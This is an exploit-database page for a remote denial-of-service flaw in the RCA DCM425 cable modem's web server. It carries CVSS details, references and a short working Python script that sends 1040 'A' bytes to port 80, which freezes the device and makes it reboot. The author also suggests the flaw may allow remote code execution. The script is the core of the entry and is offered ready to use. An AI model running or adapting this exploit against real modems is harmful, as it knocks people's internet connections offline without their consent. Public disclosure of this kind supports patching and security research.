RCA DCM425 Cable Modem micro_httpd DoS/PoC

2010-04-28 / 2010-04-29
Credit: ad0nis
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python # Title: RCA DCM425 Cable Modem micro_httpd DoS/PoC # Date: 02/27/10 # Author: ad0nis # Info: This script causes a Denial of Service on a DCM425 cable modem. # Sending 1040 bytes causes a reboot of the device after a few seconds # of it freezing up. I believe this may lead to remote code execution # but I did not bother to test it further. # By default, this cable modem has an IP address of 192.168.100.1 # There are two different but similar models of this router, the only # difference I see between them is that one has an On/Off button on the # front. The one I discovered this on is the one without a button. I # have not tested this on the other model. # Thanks to ShadowHatesYou for the inspiration to look closer at the # little black box on my network. import sys, socket target = sys.argv[1] buffer = ( "\x41" * 1040 ) print "Sending 1040 A's to" ,target, "on port 80\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,80)) s.send(buffer) s.close()

References:

http://www.securityfocus.com/bid/38488
http://secunia.com/advisories/38778
http://packetstormsecurity.org/1002-exploits/rcadcm425-dos.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top